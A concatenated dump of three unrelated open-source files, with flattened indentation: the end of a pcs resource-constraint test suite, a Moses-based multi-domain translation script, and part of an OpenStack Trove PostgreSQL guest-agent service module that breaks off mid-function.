report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R",
),
],
)
def test_master_false_clone_resource(self):
element = self._fixture_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./primitive"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R",
),
],
)
def test_master_true_clone_group(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group"), True),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="G",
),
],
)
def test_master_false_clone_group(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="G",
),
],
)
def test_master_true_clone_group_resource(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), True),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R",
),
],
)
def test_master_false_clone_group_resource(self):
element = self._fixture_group_clone(False)
assert_report_item_list_equal(
self.validate(element.find("./group/primitive"), False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_CLONE,
resource_id="R",
),
],
)
def test_bundle(self):
element = self._fixture_bundle()
assert_report_item_list_equal(
self.validate(element, False),
[
fixture.error(
report_codes.CANNOT_MOVE_RESOURCE_BUNDLE,
resource_id="R-bundle",
),
],
)
def test_bundle_resource(self):
element = self._fixture_bundle()
assert_report_item_list_equal(
self.validate(element.find("./primitive"), False), []
)
class ValidateBan(ValidateMoveBanClearMixin, TestCase):
validate = staticmethod(common.validate_ban)
report_code_bad_master = (
report_codes.CANNOT_BAN_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
)
class ValidateUnmoveUnban(ValidateMoveBanClearMixin, TestCase):
validate = staticmethod(common.validate_unmove_unban)
report_code_bad_master = (
report_codes.CANNOT_UNMOVE_UNBAN_RESOURCE_MASTER_RESOURCE_NOT_PROMOTABLE
)
class FindResourcesToDelete(TestCase):
# pylint: disable=too-many-public-methods
def assert_element2element_list(self, element_id, element_id_list):
self.assertEqual(
common.find_resources_to_delete(
fixture_cib.xpath(f'.//*[@id="{element_id}"]')[0]
),
[
fixture_cib.xpath(f'.//*[@id="{_id}"]')[0]
for _id in element_id_list
],
)
def test_primitive(self):
self.assert_element2element_list("A", ["A"])
def test_clone(self):
self.assert_element2element_list("B-clone", ["B-clone", "B"])
def test_primitive_in_clone(self):
self.assert_element2element_list("B", ["B-clone", "B"])
def test_master(self):
self.assert_element2element_list("C-master", ["C-master", "C"])
def test_primitive_in_master(self):
self.assert_element2element_list("C", ["C-master", "C"])
def test_group(self):
self.assert_element2element_list("D", ["D", "D1", "D2"])
def test_primitive_in_group(self):
self.assert_element2element_list("D1", ["D1"])
def test_clone_with_group(self):
self.assert_element2element_list(
"E-clone",
["E-clone", "E", "E1", "E2"],
)
def test_group_in_clone(self):
self.assert_element2element_list("E", ["E-clone", "E", "E1", "E2"])
def test_primitive_in_cloned_group(self):
self.assert_element2element_list("E2", ["E2"])
def test_master_with_group(self):
self.assert_element2element_list(
"F-master",
["F-master", "F", "F1", "F2"],
)
def test_group_in_master(self):
self.assert_element2element_list("F", ["F-master", "F", "F1", "F2"])
def test_primitive_in_mastered_group(self):
self.assert_element2element_list("F1", ["F1"])
def test_empty_bundle(self):
self.assert_element2element_list("G-bundle", ["G-bundle"])
def test_bundle_with_primitive(self):
self.assert_element2element_list("H-bundle", ["H-bundle", "H"])
def test_primitive_in_bundle(self):
self.assert_element2element_list("H", ["H"])
def test_group_with_single_primitive(self):
self.assert_element2element_list("I", ["I", "I1"])
def test_single_primitive_in_group(self):
self.assert_element2element_list("I1", ["I", "I1"])
def test_clone_with_group_with_single_primitive(self):
self.assert_element2element_list("J-clone", ["J-clone", "J", "J1"])
def test_group_with_single_primitive_in_clone(self):
self.assert_element2element_list("J", ["J-clone", "J", "J1"])
def test_single_primitive_in_cloned_group(self):
self.assert_element2element_list("J1", ["J-clone", "J", "J1"])
def test_master_with_group_with_single_primitive(self):
self.assert_element2element_list("K-master", ["K-master", "K", "K1"])
def test_group_with_single_primitive_in_master(self):
self.assert_element2element_list("K", ["K-master", "K", "K1"])
def test_single_primitive_in_mastered_group(self):
self.assert_element2element_list("K1", ["K-master", "K", "K1"])
| gpl-2.0 |
rsennrich/multidomain_smt | main.py | 1 | 5816 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# please set paths to the required tools in config.py
# this scripts performs (part of) the experiments described in (Sennrich, Schwenk & Aransa 2013).
# Specifically, it takes a vector of (source-side) texts (LM_TEXTS), trains a language model on each,
# and then clusters a development set (DEV_L1/DEV_L2) with K-means clustering (K clusters).
# for each cluster, the set of phrase pairs is extracted with MOSES_TRAINING,
# given a moses config (MOSES_CFG) that uses a PhraseDictionaryMultiModelCounts0 with all desired component models,
# the script starts a moses server instance (MOSES_SERVER, MOSES_SERVER_PORT, MOSES_SERVER_URL) and optimizes the translation model weights for each cluster.
# finally, the script translates the test set (TEST_SET) by assigning each test set sentence to the closest cluster, then using its weights for translation.
# What this script does *not* do (but what is described in (Sennrich, Schwenk & Aransa 2013), is a retuning of the log-linear parameters (MERT) with the optimized translation models,
# and language model switching.
import sys
import os
import shutil
import gzip
from subprocess import Popen, PIPE
#directory which contains scripts (hardcode this if you use PBS or other cluster infrastructure which moves scripts)
sys.path.append('./')
import cluster
import translate
from config import *
def create_clusters():
"""create K clusters from development data, and store relevant information to persistent_data.txt"""
c = cluster.Cluster(LMs, DEV_L1, DEV_L2, K, general_lm=GENERAL_LM, working_dir=WORKING_DIR)
clusters, centroids = c.kmeans()
c.writedown(clusters)
c.write_persistent_data(clusters, centroids, 'persistent_data.txt')
return centroids
def optimize_weights_online():
"""optimize instance weights on a set of phrase pairs. uses mosesserver, so no system restart is required"""
weights = []
for i in range(K):
temp_model_path = os.path.join(WORKING_DIR, 'model' + str(i))
bitext_path = os.path.join(WORKING_DIR, str(i))
specific_options = ['-root-dir', temp_model_path,
'-corpus', bitext_path,
'-f', 's', '-e', 't']
train_cmd = MOSES_TRAINING + specific_options
p = Popen(train_cmd)
p.wait()
extract_file = os.path.join(temp_model_path, 'model', 'extract.sorted.gz')
phrase_pairs = read_phrase_pairs(gzip.open(extract_file))
weight_flat = translate.optimize(phrase_pairs, MOSES_SERVER_URL)
weights.append(weight_flat)
sys.stderr.write('All weights:\n')
for w in weights:
sys.stderr.write(' '.join(map(str,w)) + '\n')
sys.stderr.write('\n')
return weights
def read_phrase_pairs(input_object):
"""convert Moses extract file into a list of phrase pairs"""
pb = []
for line in input_object:
line = line.split(' ||| ')
pb.append((line[0],line[1]))
return pb
def translate_text(text, centroids, weights, output_file):
"""translate a text with given centroids and instance weights for each centroid.
each sentence is assigned to the closest centroid and during translation, the corresponding instance weights are used"""
sent_in = open(text,'r').readlines()
C = cluster.Cluster(LMs, None, None, K, general_lm=GENERAL_LM, working_dir=WORKING_DIR)
weighted_text = translate.assign_weights(sent_in, C, centroids, weights)
translate.translate_concurrent(weighted_text, MOSES_SERVER_URL, output_file, NUM_PROCESSES)
def write_weights_to_file(weights, f):
fobj = open(os.path.join(WORKING_DIR,f),'w')
for w in weights:
fobj.write(' '.join(map(str,w)) + '\n')
fobj.close()
if __name__ == '__main__':
if not os.path.exists(WORKING_DIR):
os.mkdir(WORKING_DIR)
# copy files to working directories so you can re-use config
shutil.copy(sys.argv[0], WORKING_DIR)
shutil.copy('cluster.py', WORKING_DIR)
shutil.copy('translate.py', WORKING_DIR)
shutil.copy('config.py', WORKING_DIR)
# train LMs
GENERAL_LM = None
LMs = []
if USING_LM_PATHS:
if GENERAL_LM_TEXT:
GENERAL_LM = cluster.SRILM_interface(GENERAL_LM_TEXT, order=LM_ORDER)
LMs = [cluster.SRILM_interface(f, order=LM_ORDER) for f in LM_TEXTS]
else:
if GENERAL_LM_TEXT:
lm_name = os.path.basename(GENERAL_LM_TEXT).split('.')[0] + '.lm'
lm_name = os.path.join(LM_DIR, lm_name)
GENERAL_LM = cluster.SRILM_interface(lm_name, order=LM_ORDER, text=GENERAL_LM_TEXT)
for textfile in LM_TEXTS:
lm_name = os.path.basename(textfile).split('.')[0] + '.lm'
lm_name = os.path.join(LM_DIR, lm_name)
LMs.append(cluster.SRILM_interface(lm_name, order=LM_ORDER, text=textfile))
sys.stderr.write('Executing: ' + ' '.join(MOSES_SERVER) + '\n')
p = Popen(MOSES_SERVER) # we start server first because it needs to be up when we start translating.
# if not already done, cluster development data
if os.path.exists(os.path.join(WORKING_DIR, 'persistent_data.txt')):
centroids = translate.read_centroids(os.path.join(WORKING_DIR, 'persistent_data.txt'))
else:
centroids = create_clusters()
# if not already done, optimize instance weights for each cluster
if os.path.exists(os.path.join(WORKING_DIR, 'persistent_weights.txt')):
weights = translate.read_weights(os.path.join(WORKING_DIR, 'persistent_weights.txt'))
else:
weights = optimize_weights_online()
write_weights_to_file(weights, 'persistent_weights.txt')
# translate a new text
translate_text(TEST_SET, centroids, weights, os.path.join(WORKING_DIR, 'output.txt'))
p.kill()
| gpl-2.0 |
Tesora-Release/tesora-trove | trove/guestagent/datastore/postgresql/service.py | 1 | 38986 | # Copyright (c) 2013 OpenStack Foundation
# Copyright (c) 2016 Tesora, Inc.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import os
import re
from oslo_log import log as logging
import psycopg2
from trove.common import cfg
from trove.common import exception
from trove.common.i18n import _
from trove.common import instance
from trove.common import pagination
from trove.common.stream_codecs import PropertiesCodec
from trove.common import utils
from trove.guestagent.common.configuration import ConfigurationManager
from trove.guestagent.common.configuration import OneFileOverrideStrategy
from trove.guestagent.common import guestagent_utils
from trove.guestagent.common import operating_system
from trove.guestagent.common.operating_system import FileMode
from trove.guestagent.datastore.postgresql import pgsql_query
from trove.guestagent.datastore import service
from trove.guestagent.db import models
from trove.guestagent import pkg
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
BACKUP_CFG_OVERRIDE = 'PgBaseBackupConfig'
DEBUG_MODE_OVERRIDE = 'DebugLevelOverride'
class PgSqlApp(object):
OS = operating_system.get_os()
LISTEN_ADDRESSES = ['*'] # Listen on all available IP (v4/v6) interfaces.
ADMIN_USER = 'os_admin' # Trove's administrative user.
def __init__(self):
super(PgSqlApp, self).__init__()
self._current_admin_user = None
self.status = PgSqlAppStatus(self.pgsql_extra_bin_dir)
revision_dir = guestagent_utils.build_file_path(
os.path.dirname(self.pgsql_config),
ConfigurationManager.DEFAULT_STRATEGY_OVERRIDES_SUB_DIR)
self.configuration_manager = ConfigurationManager(
self.pgsql_config, self.pgsql_owner, self.pgsql_owner,
PropertiesCodec(
delimiter='=',
string_mappings={'on': True, 'off': False, "''": None}),
requires_root=True,
override_strategy=OneFileOverrideStrategy(revision_dir))
@property
def service_candidates(self):
return ['postgresql']
@property
def pgsql_owner(self):
return 'postgres'
@property
def default_superuser_name(self):
return "postgres"
@property
def pgsql_base_data_dir(self):
return '/var/lib/postgresql/'
@property
def pgsql_pid_file(self):
return guestagent_utils.build_file_path(self.pgsql_run_dir,
'postgresql.pid')
@property
def pgsql_run_dir(self):
return '/var/run/postgresql/'
@property
def pgsql_extra_bin_dir(self):
"""Redhat and Ubuntu packages for PgSql do not place 'extra' important
binaries in /usr/bin, but rather in a directory like /usr/pgsql-9.4/bin
in the case of PostgreSQL 9.4 for RHEL/CentOS
"""
return {
operating_system.DEBIAN: '/usr/lib/postgresql/%s/bin/',
operating_system.REDHAT: '/usr/pgsql-%s/bin/',
operating_system.SUSE: '/usr/bin/'
}[self.OS] % self.pg_version[1]
@property
def pgsql_config(self):
return self._find_config_file('postgresql.conf')
@property
def pgsql_hba_config(self):
return self._find_config_file('pg_hba.conf')
@property
def pgsql_ident_config(self):
return self._find_config_file('pg_ident.conf')
def _find_config_file(self, name_pattern):
version_base = guestagent_utils.build_file_path(self.pgsql_config_dir,
self.pg_version[1])
return sorted(operating_system.list_files_in_directory(
version_base, recursive=True, pattern=name_pattern,
as_root=True), key=len)[0]
@property
def pgsql_config_dir(self):
return {
operating_system.DEBIAN: '/etc/postgresql/',
operating_system.REDHAT: '/var/lib/postgresql/',
operating_system.SUSE: '/var/lib/pgsql/'
}[self.OS]
@property
def pgsql_log_dir(self):
return "/var/log/postgresql/"
def build_admin(self):
return PgSqlAdmin(self.get_current_admin_user())
def update_overrides(self, context, overrides, remove=False):
if remove:
self.configuration_manager.remove_user_override()
elif overrides:
self.configuration_manager.apply_user_override(overrides)
def set_current_admin_user(self, user):
self._current_admin_user = user
def get_current_admin_user(self):
if self._current_admin_user is not None:
return self._current_admin_user
if self.status.is_installed:
return models.PostgreSQLUser(self.ADMIN_USER)
return models.PostgreSQLUser(self.default_superuser_name)
def apply_overrides(self, context, overrides):
self.reload_configuration()
def reload_configuration(self):
"""Send a signal to the server, causing configuration files to be
reloaded by all server processes.
Active queries or connections to the database will not be
interrupted.
NOTE: Do not use the 'SET' command as it only affects the current
session.
"""
self.build_admin().psql(
"SELECT pg_reload_conf()")
def reset_configuration(self, context, configuration):
"""Reset the PgSql configuration to the one given.
"""
config_contents = configuration['config_contents']
self.configuration_manager.save_configuration(config_contents)
def start_db_with_conf_changes(self, context, config_contents):
"""Starts the PgSql instance with a new configuration."""
if self.status.is_running:
raise RuntimeError(_("The service is still running."))
self.configuration_manager.save_configuration(config_contents)
# The configuration template has to be updated with
# guestagent-controlled settings.
self.apply_initial_guestagent_configuration()
self.start_db()
def apply_initial_guestagent_configuration(self):
"""Update guestagent-controlled configuration properties.
"""
LOG.debug("Applying initial guestagent configuration.")
file_locations = {
'data_directory': self._quote(self.pgsql_data_dir),
'hba_file': self._quote(self.pgsql_hba_config),
'ident_file': self._quote(self.pgsql_ident_config),
'external_pid_file': self._quote(self.pgsql_pid_file),
'unix_socket_directories': self._quote(self.pgsql_run_dir),
'listen_addresses': self._quote(','.join(self.LISTEN_ADDRESSES)),
'port': cfg.get_configuration_property('postgresql_port')}
self.configuration_manager.apply_system_override(file_locations)
self._apply_access_rules()
@staticmethod
def _quote(value):
return "'%s'" % value
def _apply_access_rules(self):
LOG.debug("Applying database access rules.")
# Connections to all resources are granted.
#
# Local access from administrative users is implicitly trusted.
#
# Remote access from the Trove's account is always rejected as
# it is not needed and could be used by malicious users to hijack the
# instance.
#
# Connections from other accounts always require a double-MD5-hashed
# password.
#
# Make the rules readable only by the Postgres service.
#
# NOTE: The order of entries is important.
# The first failure to authenticate stops the lookup.
# That is why the 'local' connections validate first.
# The OrderedDict is necessary to guarantee the iteration order.
local_admins = ','.join([self.default_superuser_name, self.ADMIN_USER])
remote_admins = self.ADMIN_USER
access_rules = OrderedDict(
[('local', [['all', local_admins, None, 'trust'],
['replication', local_admins, None, 'trust'],
['all', 'all', None, 'md5']]),
('host', [['all', local_admins, '127.0.0.1/32', 'trust'],
['all', local_admins, '::1/128', 'trust'],
['all', local_admins, 'localhost', 'trust'],
['all', remote_admins, '0.0.0.0/0', 'reject'],
['all', remote_admins, '::/0', 'reject'],
['all', 'all', '0.0.0.0/0', 'md5'],
['all', 'all', '::/0', 'md5']])
])
operating_system.write_file(self.pgsql_hba_config, access_rules,
PropertiesCodec(
string_mappings={'\t': None}),
as_root=True)
operating_system.chown(self.pgsql_hba_config,
self.pgsql_owner, self.pgsql_owner,
as_root=True)
operating_system.chmod(self.pgsql_hba_config, FileMode.SET_USR_RO,
as_root=True)
def disable_backups(self):
"""Reverse overrides applied by PgBaseBackup strategy"""
if not self.configuration_manager.has_system_override(
BACKUP_CFG_OVERRIDE):
return
LOG.info("Removing configuration changes for backups")
self.configuration_manager.remove_system_override(BACKUP_CFG_OVERRIDE)
self.remove_wal_archive_dir()
self.restart()
def enable_backups(self):
"""Apply necessary changes to config to enable WAL-based backups
if we are using the PgBaseBackup strategy
"""
LOG.info("Checking if we need to apply changes to WAL config")
if 'PgBaseBackup' not in self.backup_strategy:
return
if self.configuration_manager.has_system_override(BACKUP_CFG_OVERRIDE):
return
LOG.info("Applying changes to WAL config for use by base backups")
arch_cmd = "'test ! -f {wal_arch}/%f && cp %p {wal_arch}/%f'".format(
wal_arch=self.wal_archive_location
)
opts = {
# FIXME(atomic77) These spaces after the options are needed until
# DBAAS-949 is fixed
'wal_level ': 'hot_standby',
'archive_mode ': 'on',
'max_wal_senders': 8,
# 'checkpoint_segments ': 8,
'wal_keep_segments': 8,
'archive_command': arch_cmd
}
if self.pg_version[1] in ('9.4', '9.5'):
opts['wal_log_hints'] = 'on'
self.configuration_manager.apply_system_override(opts,
BACKUP_CFG_OVERRIDE)
# self.enable_debugging(level=1)
self.restart()
def disable_debugging(self, level=1):
"""Enable debug-level logging in postgres"""
self.configuration_manager.remove_system_override(DEBUG_MODE_OVERRIDE)
def enable_debugging(self, level=1):
"""Enable debug-level logging in postgres"""
opt = {'log_min_messages': 'DEBUG%s' % level}
self.configuration_manager.apply_system_override(opt,
DEBUG_MODE_OVERRIDE)
def install(self, context, packages):
"""Install one or more packages that postgresql needs to run.
The packages parameter is a string representing the package names that
should be given to the system's package manager.
"""
LOG.debug(
"{guest_id}: Beginning PgSql package installation.".format(
guest_id=CONF.guest_id
)
)
self.recreate_wal_archive_dir()
packager = pkg.Package()
if not packager.pkg_is_installed(packages):
try:
LOG.info(
_("{guest_id}: Installing ({packages}).").format(
guest_id=CONF.guest_id,
packages=packages,
)
)
packager.pkg_install(packages, {}, 1000)
except (pkg.PkgAdminLockError, pkg.PkgPermissionError,
pkg.PkgPackageStateError, pkg.PkgNotFoundError,
pkg.PkgTimeout, pkg.PkgScriptletError,
pkg.PkgDownloadError, pkg.PkgSignError,
pkg.PkgBrokenError):
LOG.exception(
"{guest_id}: There was a package manager error while "
"trying to install ({packages}).".format(
guest_id=CONF.guest_id,
packages=packages,
)
)
raise
except Exception:
LOG.exception(
"{guest_id}: The package manager encountered an unknown "
"error while trying to install ({packages}).".format(
guest_id=CONF.guest_id,
packages=packages,
)
)
raise
else:
self.start_db()
LOG.debug(
"{guest_id}: Completed package installation.".format(
guest_id=CONF.guest_id,
)
)
@property
def pgsql_recovery_config(self):
return os.path.join(self.pgsql_data_dir, "recovery.conf")
@property
def pgsql_data_dir(self):
return os.path.dirname(self.pg_version[0])
@property
def pg_version(self):
"""Find the database version file stored in the data directory.
:returns: A tuple with the path to the version file
(in the root of the data directory) and the version string.
"""
version_files = operating_system.list_files_in_directory(
self.pgsql_base_data_dir, recursive=True, pattern='PG_VERSION',
as_root=True)
version_file = sorted(version_files, key=len)[0]
version = operating_system.read_file(version_file, as_root=True)
return version_file, version.strip()
def restart(self):
self.status.restart_db_service(
self.service_candidates, CONF.state_change_wait_time)
def start_db(self, enable_on_boot=True, update_db=False):
self.status.start_db_service(
self.service_candidates, CONF.state_change_wait_time,
enable_on_boot=enable_on_boot, update_db=update_db)
def stop_db(self, do_not_start_on_reboot=False, update_db=False):
self.status.stop_db_service(
self.service_candidates, CONF.state_change_wait_time,
disable_on_boot=do_not_start_on_reboot, update_db=update_db)
def secure(self, context):
"""Create an administrative user for Trove.
Force password encryption.
Also disable the built-in superuser
"""
password = utils.generate_random_password()
os_admin_db = models.PostgreSQLSchema(self.ADMIN_USER)
os_admin = models.PostgreSQLUser(self.ADMIN_USER, password)
os_admin.databases.append(os_admin_db.serialize())
postgres = models.PostgreSQLUser(self.default_superuser_name)
admin = PgSqlAdmin(postgres)
admin._create_database(context, os_admin_db)
admin._create_admin_user(context, os_admin,
encrypt_password=True)
PgSqlAdmin(os_admin).alter_user(context, postgres, None,
'NOSUPERUSER', 'NOLOGIN')
self.set_current_admin_user(os_admin)
def pg_current_xlog_location(self):
"""Wrapper for pg_current_xlog_location()
Cannot be used against a running slave
"""
r = self.build_admin().query("SELECT pg_current_xlog_location()")
return r[0][0]
def pg_last_xlog_replay_location(self):
"""Wrapper for pg_last_xlog_replay_location()
For use on standby servers
"""
r = self.build_admin().query("SELECT pg_last_xlog_replay_location()")
return r[0][0]
def pg_is_in_recovery(self):
"""Wrapper for pg_is_in_recovery() for detecting a server in
standby mode
"""
r = self.build_admin().query("SELECT pg_is_in_recovery()")
return r[0][0]
def pg_primary_host(self):
"""There seems to be no way to programmatically determine this
on a hot standby, so grab what we have written to the recovery
file
"""
r = operating_system.read_file(self.pgsql_recovery_config,
as_root=True)
regexp = re.compile("host=(\d+.\d+.\d+.\d+) ")
m = regexp.search(r)
return m.group(1)
def recreate_wal_archive_dir(self):
wal_archive_dir = self.wal_archive_location
operating_system.remove(wal_archive_dir, force=True, recursive=True,
as_root=True)
operating_system.create_directory(wal_archive_dir,
user=self.pgsql_owner,
group=self.pgsql_owner,
force=True, as_root=True)
def remove_wal_archive_dir(self):
wal_archive_dir = self.wal_archive_location
operating_system.remove(wal_archive_dir, force=True, recursive=True,
as_root=True)
def is_root_enabled(self, context):
"""Return True if there is a superuser account enabled.
"""
results = self.build_admin().query(
pgsql_query.UserQuery.list_root(),
timeout=30,
)
# There should be only one superuser (Trove's administrative account).
return len(results) > 1 or (results[0][0] != self.ADMIN_USER)
def enable_root(self, context, root_password=None):
"""Create a superuser user or reset the superuser password.
The default PostgreSQL administration account is 'postgres'.
This account always exists and cannot be removed.
Its attributes and access can however be altered.
Clients can connect from the localhost or remotely via TCP/IP:
Local clients (e.g. psql) can connect from a preset *system* account
called 'postgres'.
This system account has no password and is *locked* by default,
so that it can be used by *local* users only.
It should *never* be enabled (or it's password set)!!!
That would just open up a new attack vector on the system account.
Remote clients should use a build-in *database* account of the same
name. It's password can be changed using the "ALTER USER" statement.
Access to this account is disabled by Trove exposed only once the
superuser access is requested.
Trove itself creates its own administrative account.
{"_name": "postgres", "_password": "<secret>"}
"""
user = self.build_root_user(root_password)
self.build_admin().alter_user(
context, user, None, *PgSqlAdmin.ADMIN_OPTIONS)
return user.serialize()
def build_root_user(self, password=None):
return models.PostgreSQLRootUser(password=password)
def pg_start_backup(self, backup_label):
r = self.build_admin().query(
"SELECT pg_start_backup('%s', true)" % backup_label)
return r[0][0]
def pg_xlogfile_name(self, start_segment):
r = self.build_admin().query(
"SELECT pg_xlogfile_name('%s')" % start_segment)
return r[0][0]
def pg_stop_backup(self):
r = self.build_admin().query("SELECT pg_stop_backup()")
return r[0][0]
def disable_root(self, context):
"""Generate a new random password for the public superuser account.
Do not disable its access rights. Once enabled the account should
stay that way.
"""
self.enable_root(context)
def enable_root_with_password(self, context, root_password=None):
return self.enable_root(context, root_password)
@property
def wal_archive_location(self):
return cfg.get_configuration_property('wal_archive_location')
@property
def backup_strategy(self):
return cfg.get_configuration_property('backup_strategy')
def save_files_pre_upgrade(self, mount_point):
LOG.debug('Saving files pre-upgrade.')
mnt_etc_dir = os.path.join(mount_point, 'save_etc')
if self.OS != operating_system.REDHAT:
# No need to store the config files away for Redhat because
# they are already stored in the data volume.
operating_system.remove(mnt_etc_dir, force=True, as_root=True)
operating_system.copy(self.pgsql_config_dir, mnt_etc_dir,
preserve=True, recursive=True, as_root=True)
return {'save_etc': mnt_etc_dir}
def restore_files_post_upgrade(self, upgrade_info):
LOG.debug('Restoring files post-upgrade.')
if self.OS != operating_system.REDHAT:
# No need to restore the config files for Redhat because
# they are already in the data volume.
operating_system.copy('%s/.' % upgrade_info['save_etc'],
self.pgsql_config_dir,
preserve=True, recursive=True,
force=True, as_root=True)
operating_system.remove(upgrade_info['save_etc'], force=True,
as_root=True)
class PgSqlAppStatus(service.BaseDbStatus):
HOST = 'localhost'
def __init__(self, tools_dir):
super(PgSqlAppStatus, self).__init__()
self._cmd = guestagent_utils.build_file_path(tools_dir, 'pg_isready')
def _get_actual_db_status(self):
try:
utils.execute_with_timeout(
self._cmd, '-h', self.HOST, log_output_on_error=True)
return instance.ServiceStatuses.RUNNING
except exception.ProcessExecutionError:
return instance.ServiceStatuses.SHUTDOWN
except utils.Timeout:
return instance.ServiceStatuses.BLOCKED
except Exception:
LOG.exception(_("Error getting Postgres status."))
return instance.ServiceStatuses.CRASHED
return instance.ServiceStatuses.SHUTDOWN
class PgSqlAdmin(object):
# Default set of options of an administrative account.
ADMIN_OPTIONS = (
'SUPERUSER', 'CREATEDB', 'CREATEROLE', 'INHERIT', 'REPLICATION',
'LOGIN'
)
def __init__(self, user):
port = cfg.get_configuration_property('postgresql_port')
self.__connection = PostgresLocalhostConnection(user.name, port=port)
def grant_access(self, context, username, hostname, databases):
"""Give a user permission to use a given database.
The username and hostname parameters are strings.
The databases parameter is a list of strings representing the names of
the databases to grant permission on.
"""
for database in databases:
LOG.info(
_("{guest_id}: Granting user ({user}) access to database "
"({database}).").format(
guest_id=CONF.guest_id,
user=username,
database=database,)
)
self.psql(
pgsql_query.AccessQuery.grant(
user=username,
database=database,
),
timeout=30,
)
def revoke_access(self, context, username, hostname, database):
"""Revoke a user's permission to use a given database.
The username and hostname parameters are strings.
The database parameter is a string representing the name of the
database.
"""
LOG.info(
_("{guest_id}: Revoking user ({user}) access to database"
"({database}).").format(
guest_id=CONF.guest_id,
user=username,
database=database,)
)
self.psql(
pgsql_query.AccessQuery.revoke(
user=username,
database=database,
),
timeout=30,
)
def list_access(self, context, username, hostname):
"""List database for which the given user as access.
Return a list of serialized Postgres databases.
"""
if self.user_exists(username):
return [db.serialize() for db in self._get_databases_for(username)]
raise exception.UserNotFound(username)
def _get_databases_for(self, username):
"""Return all Postgres databases accessible by a given user."""
results = self.query(
pgsql_query.AccessQuery.list(user=username),
timeout=30,
)
return [models.PostgreSQLSchema(
row[0].strip(), character_set=row[1], collate=row[2])
for row in results]
def create_database(self, context, databases):
"""Create the list of specified databases.
The databases parameter is a list of serialized Postgres databases.
"""
for database in databases:
self._create_database(
context,
models.PostgreSQLSchema.deserialize_schema(database))
def _create_database(self, context, database):
"""Create a database.
:param database: Database to be created.
:type database: PostgreSQLSchema
"""
LOG.info(
_("{guest_id}: Creating database {name}.").format(
guest_id=CONF.guest_id,
name=database.name,
)
)
self.psql(
pgsql_query.DatabaseQuery.create(
name=database.name,
encoding=database.character_set,
collation=database.collate,
),
timeout=30,
)
def delete_database(self, context, database):
"""Delete the specified database.
"""
self._drop_database(
models.PostgreSQLSchema.deserialize_schema(database))
def _drop_database(self, database):
"""Drop a given Postgres database.
:param database: Database to be dropped.
:type database: PostgreSQLSchema
"""
LOG.info(
_("{guest_id}: Dropping database {name}.").format(
guest_id=CONF.guest_id,
name=database.name,
)
)
self.psql(
pgsql_query.DatabaseQuery.drop(name=database.name),
timeout=30,
)
def list_databases(self, context, limit=None, marker=None,
include_marker=False):
"""List all databases on the instance.
Return a paginated list of serialized Postgres databases.
"""
dbs = [db.serialize() for db in self._get_databases()]
dblist, marker = pagination.paginate_dict_list(dbs, limit, marker,
include_marker)
return dblist, marker
def _get_databases(self):
"""Return all non-system Postgres databases on the instance."""
results = self.query(
pgsql_query.DatabaseQuery.list(ignore=self.ignore_dbs),
timeout=30,
)
return [models.PostgreSQLSchema(
row[0].strip(), character_set=row[1], collate=row[2])
for row in results]
def create_user(self, context, users):
"""Create users and grant privileges for the specified databases.
The users parameter is a list of serialized Postgres users.
"""
for user in users:
self._create_user(
context,
models.PostgreSQLUser.deserialize_user(user), None)
def _create_user(self, context, user, encrypt_password=None, *options):
"""Create a user and grant privileges for the specified databases.
:param user: User to be created.
:type user: PostgreSQLUser
:param encrypt_password: Store passwords encrypted if True.
Fallback to configured default
behavior if None.
:type encrypt_password: boolean
:param options: Other user options.
:type options: list
"""
LOG.info(
_("{guest_id}: Creating user {user} {with_clause}.")
.format(
guest_id=CONF.guest_id,
user=user.name,
with_clause=pgsql_query.UserQuery._build_with_clause(
'<SANITIZED>',
encrypt_password,
*options
),
)
)
self.psql(
pgsql_query.UserQuery.create(
user.name,
user.password,
encrypt_password,
*options
),
timeout=30,
)
self._grant_access(
context, user.name,
[models.PostgreSQLSchema.deserialize_schema(db)
for db in user.databases])
def _create_admin_user(self, context, user, encrypt_password=None):
self._create_user(context, user, encrypt_password, *self.ADMIN_OPTIONS)
def _grant_access(self, context, username, databases):
self.grant_access(
context,
username,
None,
[db.name for db in databases],
)
def list_users(
self, context, limit=None, marker=None, include_marker=False):
"""List all users on the instance along with their access permissions.
Return a paginated list of serialized Postgres users.
"""
users = [user.serialize() for user in self._get_users(context)]
return pagination.paginate_dict_list(users, limit, marker,
include_marker)
def _get_users(self, context):
"""Return all non-system Postgres users on the instance."""
results = self.query(
pgsql_query.UserQuery.list(ignore=self.ignore_users),
timeout=30,
)
return [self._build_user(context, row[0].strip()) for row in results]
def _build_user(self, context, username):
"""Build a model representation of a Postgres user.
Include all databases it has access to.
"""
user = models.PostgreSQLUser(username)
# The setter for DatastoreScema.databases is broken; manually
# rebuild the list of dbs this user has access to
dbs = self.list_access(context, username, None)
for d in dbs:
user.databases.append(d)
return user
def delete_user(self, context, user):
"""Delete the specified user.
"""
self._drop_user(context, models.PostgreSQLUser.deserialize_user(user))
def _drop_user(self, context, user):
"""Drop a given Postgres user.
:param user: User to be dropped.
:type user: PostgreSQLUser
"""
# Postgresql requires that you revoke grants before dropping the user
dbs = self.list_access(context, user.name, None)
for d in dbs:
db = models.PostgreSQLSchema.deserialize_schema(d)
self.revoke_access(context, user.name, None, db.name)
LOG.info(
_("{guest_id}: Dropping user {name}.").format(
guest_id=CONF.guest_id,
name=user.name,
)
)
self.psql(
